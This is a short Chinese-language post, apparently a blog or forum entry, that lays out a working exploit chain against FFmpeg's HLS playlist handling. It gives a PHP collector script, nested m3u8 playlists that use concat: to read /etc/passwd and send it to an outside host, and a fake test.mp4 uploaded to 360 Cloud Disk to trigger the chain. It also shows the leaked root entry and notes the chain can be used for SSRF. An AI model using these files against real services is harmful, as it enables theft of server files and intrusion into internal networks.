好像是FFmpeg分段读取的问题,然后自己动手测试.一共4个文件:comm.php (接收用的 也可以用监听一个端口)
file_put_contents(time()."_test.txt",$_GET['x']);
?>
header.m3u8 (视频格式文件)
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:,
http://www.u-url.org/exp/movie/comm.php?x=
remote.m3u8 (第二次转发的)
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://www.u-url.org/exp/movie/header.m3u8|http://baidu.com
#EXT-X-ENDLIST
http://baidu.com 也可以换成 本地资源文件: /etc/passwd
test.mp4 (最终上传触发)
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
concat:http://www.u-url.org/exp/movie/remote.m3u8
#EXT-X-ENDLIST
一切准备号了之后就上传test.mp4到360云盘上去。
root:x:0:0:root:/root:/bin/bash
也可以ssrf